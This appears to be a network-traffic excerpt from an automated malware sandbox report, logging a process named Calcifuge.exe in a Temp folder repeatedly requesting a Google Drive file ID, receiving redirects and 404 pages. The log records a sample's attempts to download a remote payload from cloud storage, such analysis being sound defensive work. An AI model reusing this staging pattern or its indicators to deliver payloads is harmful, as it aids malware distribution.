2025-01-11 02:53:28 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wwhG2vloy0B9-C92Cu_GBA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 53773 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:53:29 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:53:30 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:29 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-4yXUiVeknKhRSsgh3N08Ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 53774 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:53:30 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:53:31 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4TyP7HKEo-aCqmH3kOXv3wrnFzhS4i8YRWj_6yP3Lx7Uo1DR4e0FEwEJgboFEX9tXGHNBsWP8
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:31 GMT
                                                                                              Content-Security-Policy: script-src 'nonce-sWdDrQwxsaTT7Q_tfPZJfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
2025-01-11 02:53:31 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4ootW5nmgufNdZn_AjeEBw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 53775 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:53:32 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:53:32 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:32 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-MKo3zsscpTMlnfVlI7bT1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 53776 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:53:33 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:53:33 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgS9CFESnjFqNbJTq93mgzw1oweHUgqV_UZiCzYk0-WceTGduNQilj0TENk2uPkiiOmc
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:33 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-TIJcnxkyUD8SrrSBW_gj6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
2025-01-11 02:53:33 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n5dtd9Bn2K6T4yENqM6Ydw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 53777 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:53:34 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:34 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-Jol3wGuZ0iaZykHy18cevQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              57 | 192.168.2.4 | 53778 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:35 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:35 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTTwdrj4cojNJT66L7JCNUh80ZW52EM_MWoYryauThTi8MRuELgBVX-1jsqRX72EwJc
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:35 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-9jZPsYEbYliB7v0dK8_RZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:35 UTC | 1652 | IN
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HxY7_ginXHnqukMmhlguvw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              58 | 192.168.2.4 | 53779 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:36 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:37 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:36 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-CaK0YKm14FSle1W1Z1rmZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              59 | 192.168.2.4 | 53780 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:37 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:38 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTZ40gr02KsgfA8SWVVO6zVTGeSgfCYrUOFE1VSulmqf_n1e59064tx_95GPoGYyDuYEfsJn4w
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:38 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-NGd7-PDhCBccOVxFbeGJhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:38 UTC | 1652 | IN
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H_FiaWk1e3YVLK5PNHK66Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              60 | 192.168.2.4 | 53781 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:39 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:39 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:39 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
